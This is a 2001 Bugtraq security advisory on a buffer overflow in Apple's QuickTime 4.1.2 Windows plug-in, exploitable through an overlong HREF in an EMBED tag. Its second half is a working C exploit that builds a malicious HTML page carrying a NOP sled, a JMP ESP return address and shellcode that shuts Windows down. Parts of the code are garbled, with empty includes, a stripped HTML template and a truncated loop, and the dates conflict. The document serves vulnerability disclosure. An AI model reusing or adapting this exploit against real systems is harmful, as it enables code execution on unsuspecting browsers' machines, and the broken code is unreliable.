From shadowpenguin@BACKSECTION.NET Wed Jan 31 23:25:32 2001 From: UNYUN To: BUGTRAQ@SECURITYFOCUS.COM Date: Wed, 31 Jan 2001 22:25:25 +0900 Subject: [BUGTRAQ] [SPSadvisory#41]Apple Quick Time Plug-in Buffer Overflow SPS Advisory #41 Apple Quick Time Plug-in Buffer Overflow UNYUN Shadow Penguin Security (http://shadowpenguin.backsection.net) -------------------------------------------------------------- [Date] July 31, 2001 [Vulnerable] QuickTime Player 4.1.2 for Windows (Japanese) [Not vulnerable] unknown [Overview] There is a exploitable buffer overflow bug in quick time plug-in for windows. This problem occurs when the visitor clicks the shown movie in the browser. Quick time plug-in doesn't check the length of HREF parameter in EMBED tag appropriately, Quick time overflows when the long string is specified in HREF. This buffer overflow overwrites the local buffer, the codes which are written in the EMBED tag can be executed in the client host. [Risk] If the HTML file which contains the cracking code in EMBED tag is opened and visitor clicks the shown movie, the cracking code will be executed on the client host. This overflow contains the possibility of the virus and trojans infection, sytsem destruction, intrusion, and so on. [Details] We explain the details of this problem under the environment of Windows98(SE/Japanes)+QuickTime Player 4.1.2 for Windows+Internet Explorer 5.0. You can check this problem easily by the following simple HTML file. * You must prepare a sample movie file to specify in "src" parameter. * Write 730 bytes characters in "href" parameter. Internet Explorer will crash by the buffer overflow when the shown movie on browser is clicked. You will be able to see that EIP is 0x61616161 in GPF dialog box when Internet Explorer is crashed. [Avoidance] Disable the execution of ActiveX control and plug-in. [Caution] We will change this information without any notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatever arising out of or in connection with the use or spread of this information. Any use of this information is only for personal experiment. [Comments ?] If you have something comments, please send to following address.. UNYUN http://shadowpenguin.backsection.net [Sample code] This sample generates a HTML file which includes the code which shutdowns Windows by using ExitWindowsEx API. The shutdown code is written in EMBED tag, and executed by using this buffer overflow problem. When you check this problem by the following sample code, you must set appropriate movie file in MOV_FILE (the movie file "sample. mov" which is written in the following code is a sample which is installed when Quick Time Player 4.1.2 is installed by default). This sample code can be compiled by Visual C++ 6.0. This sample code was checked under the environmentof Windows98 Second Edition (Japanese)+ Internet Explorer5.0. /*==================================================================== Apple QuickTime 4.1.2 plug-in exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ==================================================================== */ #include #include #include #define MOV_FILE "c:\\program files\\quicktime\\sample.mov" #define HEIGHT 60 #define WIDTH 60 #define TARGET "QUICKTIMEPLAYER" #define FILE_IMAGE \ "
" #define BUFSIZE 730 #define RET 684 #define ESP_TGT "rpcrt4.dll" #define JMPESP_1 0xff #define JMPESP_2 0xe4 #define NOP 0x90 unsigned char exploit_code[200]={ 0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50, 0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48, 0xFF,0xD0,0x00, }; main(int argc,char *argv[]) { FILE *fp; char buf[BUFSIZE]; unsigned int i,pretadr,p,ip,kp; MEMORY_BASIC_INFORMATION meminfo; if (argc<2){ printf("usage : %s Output_HTML-fileName [Sample .mov file]\n", argv[0]); exit(1); } if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){ printf("%s is not found.\n",ESP_TGT); exit(1); } VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION)); pretadr=0; for (i=0;i>8 )&0xff)==0 || ((p>>16)&0xff)==0 || ((p>>24)&0xff)==0) continue; if ( *((unsigned char *)p)==JMPESP_1 && *(((unsigned char *)p)+1)==JMPESP_2) pretadr=p; } if ((fp=fopen(argv[1],"wb"))==NULL){ printf("File write error \"%s\"\n",argv[1]); exit(1); } memset(buf,NOP,BUFSIZE); memcpy(buf+700-12,exploit_code,strlen(exploit_code)); buf[BUFSIZE-2]=0; ip=pretadr; printf("EIP=%x\n",ip); buf[RET ]=ip&0xff; buf[RET+1]=(ip>>8)&0xff; buf[RET+2]=(ip>>16)&0xff; buf[RET+3]=(ip>>24)&0xff; if (argc==2) fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET); else fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET); fclose(fp); printf("Done.\n"); } ----- UNYUN % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ] shadowpenguin@backsection.net (SPS-Official) unyun@shadowpenguin.org (Personal) % eEye Digital Security Team [ http://www.eEye.com ] unyun@eEye.com